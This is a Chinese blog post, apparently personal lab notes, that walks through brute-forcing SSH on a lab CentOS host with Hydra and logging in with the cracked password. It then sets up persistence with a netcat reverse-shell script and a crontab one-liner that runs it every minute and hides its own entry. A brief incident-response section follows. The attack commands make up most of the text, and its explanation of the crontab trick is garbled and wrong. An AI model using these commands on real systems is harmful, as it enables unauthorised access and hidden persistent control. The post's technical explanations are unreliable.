您现在的位置是:首页 >学无止境 >SSH爆破攻击及应急响应/事件处置网站首页学无止境

SSH爆破攻击及应急响应/事件处置

Neatsuki 2024-07-01 11:59:45
简介SSH爆破攻击及应急响应/事件处置

提示:本文是我做的笔记,有问题可以留言

目录

前言

提示:这里可以添加本文要记录的大概内容:

随着互联网的不断发展,网络安全越来越得到重视了…实在是编不下去了,就是想随便写一个开头,就没了。

提示:以下是本篇文章正文内容,下面案例可供参考

一、什么是SSH?

ssh(安全外壳协议)(secure shell),是一种加密的网络传输协议,可以在不安全的网络环境中提供安全的传输环境,ssh通过在网络中创建安全隧道来实现ssh客户端与服务端之间的连接,ssh最常见的用途是远程登陆系统,ssh使用率最高的场合是unix系统

二、开始前的准备

攻击机:2023.1?
在这里插入图片描述

目标机:cent os7
在这里插入图片描述

1.扫描

让我们扫描,192.168.0.147,ip地址
在这里插入图片描述
我们发现他开放22,80端口,我么先不管80端口就先攻击一下22端口。

2.准备爆破

在这里插入图片描述

hydra -L /home/kali/Desktop/user.txt -P /home/kali/Desktop/pas.txt -f -vV ssh://192.168.0.147

-L file 大写,指定用户的用户名字典
-P file 大写,用于指定密码字典。
-v / -V 显示详细过程
-f 找到第一对登录名或者密码的时候中止破解。
我们创建两个简单的字典文件
在这里插入图片描述
在这里插入图片描述
准备好字典后按下回车
在这里插入图片描述
出来了用户名是Neatsuki,密码是2468admin,当然我是不会设置这么简单的密码的,本文章完成后我会换密码的,

3.准备ssh登录

ssh Neatsuki@192.168.0.147

Neatsuki是你爆破出来的用户名,@是登陆在,192.168.0.147是你要登陆的IP/主机
在这里插入图片描述
这里要输入yes,不然登陆不进去
在这里插入图片描述
输入爆破出来的密码
在这里插入图片描述
成功登录,
在这里插入图片描述
提示符一样,这代表我们成功了

登陆后的准备

我们经历了千辛万苦,百般阻挠,终于登陆了cent os系统,但是他一旦关机或换密码,我们的努力就都白费了,所以我们要建一个跟后门差不多的东西,来权限维持。
输入vim san.sh
san你可以换掉名字随便取

#!/bin/bash
nc 192.168.0.147 7777 -e /bin/bash

这个就是nc反弹,是一个Bash脚本,它使用nc命令(也称为netcat)来连接到IP地址为192.168.0.147的计算机的7777端口。一旦连接成功,它将打开一个交互式的Bash shell,允许用户在远程计算机上执行任意命令。这个脚本的作用类似于一个远程控制工具,可以被恶意攻击者用来入侵和控制远程计算机。
让我们,来看一下它的权限

ls -l san.sh

在这里插入图片描述

现在是可读可写状态所以,我们要给予他神圣的权力(权限)

chmod +x san.sh

输入完这条命令,就会发现还和以前一样,不不不,在输入这条指令,我们要查看它的权力(权限)

ls -l san.sh

在这里插入图片描述
可以看到,多了一个字母X,我们已经授予它可执行的权限了。
然后,一个大臣还不够在招一个一个大臣
输入

vim aaa.sh

跟那个一样名字随便写

(crontab -l;printf "* * * * * /tmp/san.sh;
no crontw-wab for 'whoami'%100c
")|crontab -

另外一个大臣的作用:将一个名为san.sh的脚本文件添加到当前用户的crontab中,并在每分钟执行一次该脚本文件。同时,它会在添加完crontab后输出一段文本,提示当前用户没有crontab的写入权限。

具体来说,这条命令使用了管道符(|)将两个命令串联在一起。第一个命令是crontab -l,它会列出当前用户的crontab内容。第二个命令使用printf函数向标准输出流中输出一段文本,其中包含了一个将光标向右移动100个字符的转义序列(%100c)。这个转义序列的作用是让输出的文本在终端中居中显示。

最后,管道符将第一个命令的输出作为第二个命令的输入,将文本输出到终端中。
我们也要给他权限,

chmod +x aaa.sh

nc反弹

nc -lvp 7777

作用:这是一个用于监听网络连接的命令,具体含义如下:

  • nc:是一个网络工具,用于在网络上进行数据传输和调试。
  • -l:表示监听模式,即等待其他计算机连接。
  • -v:表示启用详细模式,输出更多的信息。
  • -p:表示指定端口号。
  • 7777:表示监听的端口号。

因此,运行该命令后,计算机会开始监听 7777 端口,等待其他计算机连接。如果有其他计算机连接到该端口,该命令会将连接的数据输出到终端上。

应急响应/事件处置

啊,这是蓝队应该看的,你们看啥,适可而止啊

1.查看网络连接情况

netstat -antpl

在这里插入图片描述
发现异常连接

2.查看守护进程

查看进程树:

pstree -p

在这里插入图片描述
查看进程:

systemctl status 3076

在这里插入图片描述
存在异常连接

3.删除,结束异常后门

删除恶意文件

crontab -r -u root

杀掉进程

kill 28377

删除文件

rm aaa.sh
rm san.sh

4.修改密码

passwd 密码

总结

本文就是很简单地讲解了ssh爆破和防御,

THE END

风语者!平时喜欢研究各种技术,目前在从事后端开发工作,热爱生活、热爱工作。

站长推荐